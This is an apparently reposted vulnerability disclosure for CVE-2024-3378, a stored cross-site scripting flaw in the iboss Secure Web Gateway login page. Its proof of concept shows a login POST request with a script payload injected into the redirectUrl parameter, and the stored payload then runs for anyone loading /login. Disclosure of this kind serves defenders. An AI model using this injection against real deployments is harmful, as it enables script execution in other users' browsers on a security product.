iboss Secure Web Gateway Exploit, Stored Cross-Site Scripting (XSS)

# Exploit Title: iboss Secure Web Gateway - Stored Cross-Site Scripting (XSS)
# Date: 4/4/2024
# Exploit Author: modrnProph3t
# Vendor Homepage: https://www.iboss.com
# Version: < 10.2.0
# CVE-2024-3378
# Reference: https://github.com/modrnProph3t/CVE/blob/main/CVE-2024-3378.md


## Description
A stored Cross Site Scripting (XSS) vulnerability was found in the iboss Secure Web Gateway product. The vulnerability is exploited by submitting a login attempt, intercepting the request, and adding a payload to the ÒredirectUrlÓ parameter before sending it to the server. After submitting the request, visiting the initial login page will cause the website to load, including the previously submitted payload.

This is an unauthenticated attack (credentials do not need to be valid) and the payload is stored on the server and included in every response to a GET request for the login page until a new POST request is made to the server without a payload included.

## Proof of Conept
1. Access the login portal located at /login


2. Submit login attempt and intercept the request

Example of unaltered request:
```
POST /user_login_submit HTTP/1.1
Host: <domain>
<--Headers Removed-->

userName=TEST&x=TEST&action=login&redirectUrl=
```


3. Insert XSS payload into the "redirectUrl" parameter

Example of request with inserted payload:
```
POST /user_login_submit HTTP/1.1
Host: <domain>
<--Headers Removed-->

userName=TEST&x=TEST&action=login&redirectUrl="><script>alert('XSS')</script>
```


4. After failed login attempt, return to the initial login page at the /login endpoint and observe payload execution

All rights reserved nPulse.net 2009 - 2024
Powered by: MVCP2 / BVCP / ASPF-MILTER / PHP 8.3 / NGINX / FreeBSD